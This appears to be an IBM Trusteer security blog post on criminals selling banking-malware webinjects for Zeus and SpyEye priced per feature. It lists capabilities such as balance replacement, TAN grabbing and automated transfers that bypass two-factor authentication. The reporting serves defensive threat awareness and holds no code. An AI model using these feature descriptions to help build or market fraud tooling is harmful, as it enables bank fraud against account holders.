IBM Trusteer researchers have long been writing about the evolving underground market for webinjects.

Our team recently discovered a new development: Criminals are now selling customized webinjects that are priced per feature. For example, one seller offers a webinject for Zeus/SpyEye that contains the automatic transfer system (ATS) that was reported by TrendMicro researchers.

Webinject Sales

In our earlier posts, we discussed the various approaches criminals have taken to sell webinjects. Initially, they used malware-based pricing, a model in which webinjects are developed for specific malware platforms such as Zeus and SpyEye and are priced per platform. Certain platforms commanded a higher price for webinjects.

This pricing system was followed by bulk pricing, where criminals offered discounts for large orders, as well as geography-based pricing, where webinject costs were determined by the geographic location of the target they were designed to attack. Next in line came production cost pricing, where sellers offered cheaper, premade webinjects and charged a premium for custom-made webinjects.

How Much Do These Cost?

The new pricing strategy we discovered for webinjects is based on the specific features requested and the user information they are designed to steal. In one advertisement we came across, the criminal offers to develop webinjects for any malware platform (e.g., SpyEye, Zeus and Ice IX) and target specified by the buyer. The following is the price list for individual webinject features that can be purchased:

  • Balance Grabber Captures the victim’s balance information and sends it to the fraudster’s command and control server. Price: $50-$100.
  • Balance Replacer Updates the “actual” balance in an online banking application’s balance page to hide the fraudulent transaction amount. This prevents the victim from realizing that fraud has taken place until he or she receives a paper statement, goes to an ATM or checks his or her balance via phone banking. Price: $200-$300.
  • TAN Grabber: Captures one-time passwords that are used by some banks to authorize online banking transactions. Price: $150-$200.
  • Additional Passwords: This mechanism requests additional passwords from a victim. Price: $100-$200.
  • Alerting: This feature sends various notifications to the malware’s administration panel and Jabber instant messenger client in real time. Price: $100-$200.
  • AZ (Dubbed “Avtozaliv“): This capability, also known as ATS, provides all the components needed to conduct automated and unattended online banking fraud; specifically, it can bypass two-factor authentication, initiate a transfer and update the account balance to hide the fraud. Price: $1,500-$2,000.

Webinjects’ Growing Reach

The advertisement also included videos that demonstrate webinjects developed to attack Italian, Spanish and German banks. This latest development in webinject marketing illustrates how the underground marketplace is following traditional software industry pricing schemes by offering à la carte and complete “suite” pricing options.

Unfortunately, buying high-quality webinjects is getting easier and more affordable, which opens the door for more criminals to get into the business of online banking fraud. Criminals are no longer bound by rigid malware configurations designed to conduct specific exploits at specific institutions. Cyber criminals can now specify the precise exploit and target institution that they believe will maximize their ability to successfully commit fraud. And, according to basic statistics, the more combinations of exploit types and targets attempted, the more likely it is that fraudsters will find the ones that succeed.

more from Malware

Raspberry Robin and Dridex: Two Birds of a Feather

IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research sheds additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security…

From Ramnit To Bumblebee (via NeverQuest): Similarities and Code Overlap Shed Light On Relationships Between Malware Developers

A comparative analysis performed by IBM Security X-Force uncovered evidence that suggests Bumblebee malware, which first appeared in the wild last year, was likely developed directly from source code associated with the Ramnit banking trojan. This newly discovered connection is particularly interesting as campaign activity has so far linked Bumblebee to affiliates of the threat group ITG23 (aka the Trickbot/Conti…